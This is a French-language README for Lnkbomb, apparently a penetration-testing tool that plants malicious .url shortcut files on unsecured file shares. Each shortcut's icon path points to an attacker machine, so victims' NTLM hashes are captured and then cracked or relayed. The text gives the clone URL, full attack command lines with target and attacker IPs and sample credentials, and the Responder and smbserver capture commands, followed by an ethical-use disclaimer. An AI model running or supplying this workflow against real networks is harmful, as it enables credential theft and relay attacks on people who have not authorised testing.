
Générateur de raccourcis malveillants pour collecter les hashs NTLM à partir de partages de fichiers non sécurisés.
Lnkbomb est utilisé pour télécharger des fichiers de raccourci malveillants vers des partages de fichiers non sécurisés. La vulnérabilité existe car Windows cherche un fichier d'icône à associer au fichier de raccourci. Ce fichier d'icône peut être redirigé vers la machine d'un testeur d'intrusion exécutant Responder ou smbserver pour collecter les hachages NTLMv1 ou NTLMv2 (selon la configuration de la machine victime). Le testeur peut ensuite tenter de casser ces hachages collectés hors ligne avec un outil comme Hashcat, ou les relayer vers un outil comme ntlmrelayx pour une exploitation plus poussée.
Le fichier de charge utile est téléchargé directement sur le partage non sécurisé spécifié par le testeur dans la ligne de commande. Le testeur inclut également son adresse IP, qui est écrite dans la charge utile.
La version 2.0 est une refonte totale de l'outil et utilise la bibliothèque pysmb, permettant des dépôts de charge utile non authentifiés et authentifiés.
Installation de Lnkbomb
Notez que le projet fonctionne de manière cohérente sous Windows. Il peut rencontrer des problèmes sous Linux.
git clone https://github.com/dievus/lnkbomb.git
Déplacez-vous dans le répertoire lnkbomb et exécutez :
python3 lnkbomb.py -h
Cela affichera le menu d'aide, qui contient les options suivantes :
-h, --help - Affiche les options d'aide
-t, --target - Spécifie l'adresse IP cible
-a, --attacker - Spécifie l'adresse IP de la machine d'attaque du testeur
-r, --recover - Utilisé pour supprimer la charge utile une fois les tests terminés (ex. -r payloadname.url)
-w, --windows - Nouvelle commande - nécessaire pour définir les ports appropriés pour les partages Windows
-l, --linux - Nouvelle commande - nécessaire pour définir les ports appropriés pour les partages Linux
-n, --netbios - Nouvelle commande - le nom NetBIOS des machines Windows ciblées doit être inclus
Exemples de commandes complètes :
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Vous devrez utiliser un outil comme Responder ou smbserver pour capturer le hachage NTLM.
responder -I eth0 -dwFP -v
ou
smbserver.py . . -smb2support
Veuillez garder à l'esprit que cet outil est destiné uniquement à des fins de tests d'intrusion et de piratage éthique. Je ne cautionne aucun comportement qui consisterait à tester des cibles pour lesquelles vous n'avez pas actuellement l'autorisation de tester.
Cet outil peut fonctionner ou non selon les correctifs et les versions de la cible. L'expérience utilisateur peut varier.
Je sais que ce sont des raccourcis .url et non des extensions .lnk. Je le fais pour vous titiller.